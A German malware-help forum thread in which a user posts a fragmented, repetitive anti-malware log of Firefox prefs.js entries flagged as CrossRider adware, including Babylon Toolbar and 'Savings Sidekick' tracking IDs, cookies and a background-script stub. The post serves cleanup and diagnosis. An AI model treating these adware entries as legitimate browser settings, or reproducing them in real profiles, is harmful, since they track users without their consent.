user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref</baddata><gooddata></gooddata><hash>81587928bdce66d06063237748bcb24e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.Baby</baddata><gooddata></gooddata><hash>68712d74c1cab28419aa2773679ddf21</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 *
 * If you make changes to this file while the application is runnin</baddata><gooddata></gooddata><hash>e2f7a1005932d1655073fd9d09fbf907</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         
Teil 4

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prtnrId&quot;, &quot;babylon&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.smplGrp&quot;, &quot;none&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.srcExt&quot;, &quot;ss&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.tlbrId&quot;, &quot;tb9&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsn&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsnTs&quot;, &quot;1.5.3.1715:08:45&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsni&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.blocklist.pingCountTotal&quot;, 1064);
user_pref(&quot;extensions.blocklist.pingCountVersion&quot;, 20);
user_pref(&quot;extensions.bootstrappedAddons&quot;, &quot;{}&quot;);
user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationTime&quot;, 1347643228);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.searchUserConifrmation&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setHomepage&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setNewTab&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setSearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.active&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.addressbar&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundjs&quot;, &quot;\n\n\&quot;undefined\&quot;!=typeof _GPL_BG_NEW&amp;&amp;appAPI.webRequest&amp;&amp;appAPI.webRequest.onBeforeNavigate?_GPL_BG_NEW.preinit():\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.can_run_bg_code&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.certdomaininstaller&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.changeprevious&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallerParams.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.expiration&quot;, &quot;Fri Nov 30 2012 17:31:43 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.value&quot;, &quot;%22nonexistantdomain.com%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.expiration&quot;, &quot;Sun Dec 02 2012 14:58:35 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.value&quot;, &quot;%22DE%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.value&quot;, &quot;1354292451&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.value&quot;, &quot;%221%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.value&quot;, &quot;%7B%22source_id%22%3A%220%22%2C%22sub_id%22%3A%220%22%2C%22uzid%22%3A%220%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.value&quot;, &quot;%2214019%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.value&quot;, &quot;1347643324716&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.value&quot;, &quot;%221224%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.value&quot;, &quot;%2282063%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.value&quot;, &quot;1347643311989&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.description&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.domain&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.enablesearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.fbremoteurl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.group&quot;, 0);
user_pref(&quot;extensions.crossriderapp5060.5060.homepage&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.iframe&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.value&quot;, &quot;%7B%22installer_bic%22%3A%22B2F0E20977AD4C33ABC24800D8090F46IE%22%2C%22installer_verifier%22%3A%22a4b03d63b8bf5d68245e569a6d0f510a%22%2C%22installer_verifier_for_215app%22%3A%222456002ffb0c784079745e982e7370a8%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.value&quot;, &quot;38&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVe</baddata><gooddata></gooddata><hash>c712fba683084beb6e559efc9074bf41</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.expirati</baddata><gooddata></gooddata><hash>19c0425fee9d82b4fdc6c4d6d430bf41</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>e.
 *
 * If you make changes to this file while the application is run</baddata><gooddata></gooddata><hash>80595051fa91f93d4182a5f511f38f71</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         

Alt 07.12.2015, 09:14   #10
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Teil 5

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
